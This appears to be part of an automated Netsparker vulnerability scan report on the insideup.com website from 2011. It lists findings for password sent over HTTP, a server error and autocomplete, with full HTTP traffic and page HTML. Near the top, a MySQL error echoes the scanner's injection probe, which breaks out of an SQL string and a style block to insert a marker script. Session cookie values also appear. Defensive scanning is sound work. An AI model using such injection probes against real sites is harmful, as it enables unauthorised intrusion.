Content-Length: 3023
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x001460)</script>/' union select prj.catI' at line 5
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /selectvendors.html

/selectvendors.html CONFIRMED

http://www.insideup.com/selectvendors.html

Form target action

Request

GET /selectvendors.html HTTP/1.1
Referer: http://www.insideup.com/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Select Vendor',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_1" style="margin-top:6px;"> <div> <div class="vendorCategoriesContanier" style="height: 210px;"> <h1 style="background-color:#f2f2f2;font-size:16px;"> Save Up to 60% on Services for Your Business <br/> <span style="font-size:14px;color:#f16913">Select Category to Get Free, No Obligation Quotes from Vendor</span> </h1> <ul class="vendorCategoriesBody"> <li><a href="http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc" title="Web Site Design" target="_new">Web Site Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc" title="Business Phone Systems" target="_new">Business Phone Systems</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc" title="Logo Design" target="_new">Logo Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc" title="Credit Card Processing" target="_new">Credit Card Processing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc" title="Incorporation" target="_new">Incorporation</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc" title="Business Loans" target="_new">Business Loans</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc" title="Outbound Telemarketing" target="_new">Outbound Telemarketing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc" title="Payroll Services" target="_new">Payroll Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc" title="Long Distance Services" target="_new">Long Distance Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc" title="Direct Mail Services" target="_new">Direct Mail Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc" title="Business Cash Advance" target="_new">Business Cash Advance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/onad00/project.php?catId=80003&iusrc=iupsc" title="Internet Marketing Services" target="_new">Internet Marketing Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc=iupsc" title="Web Hosting" target="_new">Web Hosting</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc" title="Health Insurance" target="_new">Health Insurance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc" title="Call Center Services" target="_new">Call Center Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc" title="Internet Access" target="_new">Internet Access</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/resf00/project.php?catId=40001&iusrc=iupsc" title="HR Outsourcing" target="_new">HR Outsourcing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc" title="Collection Agencies" target="_new">Collection Agencies</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/voip00/project.php?catId=110005&iusrc=iupsc" title="Business VoIP" target="_new">Business VoIP</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc" title="Accounting and Bookkeeping" target="_new">Accounting and Bookkeeping</a></li> <br class="clear" /> </ul> </div> </div> <div style="margin-top:20px;"><img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map"> <map name="Map"> <area shape="rect" coords="1,-1,185,65" href="https://twitter.com/VendorSourcing" target="_blank"> <area shape="rect" coords="197,1,381,63" href="http://www.youtube.com/insideupvendors" target="_blank"> <area shape="rect" coords="390,2,578,64" href="http://insideup.com/blogs/b2bsourcing" target="_blank"> </map> </div> <div class="clear"></div> <div class="grid_2" style="margin-left:0px;margin-top:20px;"> <a href="http://itunes.apple.com/app/insideup-vendor-quotes/id381971606?mt=8#i" target="_new"><img src="/images/iPhone-Banner.jpg"></a> </div> <div class="grid_3" style="margin-top:20px;"> <div class="vendorArticle"> <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FInsi..
Internal Server Error

Internal Server Error
1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Request

GET /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; OAID=98176d5cda925cc255264f2e6b81597a; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; PHPSESSID=bevcehsdjrij0b7vbkc95loq47
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Request processing failed; nested exception is java.lang.NullPointerException
Date: Wed, 20 Apr 2011 02:15:23 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Error Page',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <div id="midSecContainer" align="center" style="padding:40px 0 0 0;"> <div> <h4><img src="/images/errorIcon.gif" align="absmiddle" style="padding-right:10px;"/>Sorry! Some unexpected error has occurred. Please try again.</h4> </div></div><div style="margin-left:2px; padding-bottom:20px;"><img src="/images/Footer1.png" /></div>
</div> <!--Mid Container Start's Here--> <!--Footer End's Here--> <div id="footer"> <!-- put footer section here--> <!--Footer Starts--> <div id="footerLinkBlock"> <a class="footerl" href="/index.html"> Home</a> | <a class="footerl" href="/advertise.html">Advertise</a> | <a class="footerl" href="/partner.html"> Partner</a> | <a class="footerl" href="/aboutUs.html"> About Us</a> | <a class="footerl" href="/communitymainpage.html"> Resources</a> | <a class="footerl" href="/contactUs.html">Contact Us</a> | <a href="/privacy.html" class="footerl">Privacy Policy</a> | <a href="/cityLinks.html" class="footerl">Metro Search</a><br /><br /> © Copyright 2011 InsideUp, Inc. All Rights Reserved.<br /><br /> </div> <script type="text/javascript" language="javascript">llactid=18615</script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script> <!--Footer ends--><div id="errorPopUpLayerBody" style="display:none;position:absolute; Z-INDEX: 9999; LEFT: 27%; *left:15%; WIDTH: 410px; POSITION: absolute; TOP: 25%; *TOP: 18%"> <div id="popUpMain"> <div id="popUpTop"> <div id="errorTitle"> <div id="popUpTitle" class="commBlackTxt"><span id="messageId">An error has occurred:</span></div> <div id="popClose"><a href="#" onclick="closeLogin('errorPopUpLayerBody')"><img src="/images/popUpCloseBtn.gif" alt="Close" border="0" /></a></div> </div> </div> <div id="popUpMid"> <div id="popMidTextContainer"> <div id="popMidText3"> <div id="errorData"></div> </div> </div> </div> <div id="popUpBot"></div> </div></div><div id="loginlayer" style="display:none;position:absolute; Z-INDEX: 9999; LEFT: 22%; WIDTH: 410px; POSITION: absolute; TOP: 32%" ></div> <div id="trans"></div> </div> <!--Footer End's Here--> </div></body></html>
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /selectvendors.html

/selectvendors.html CONFIRMED

http://www.insideup.com/selectvendors.html

Identified Field Name

password

Request

GET /selectvendors.html HTTP/1.1
Referer: http://www.insideup.com/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select 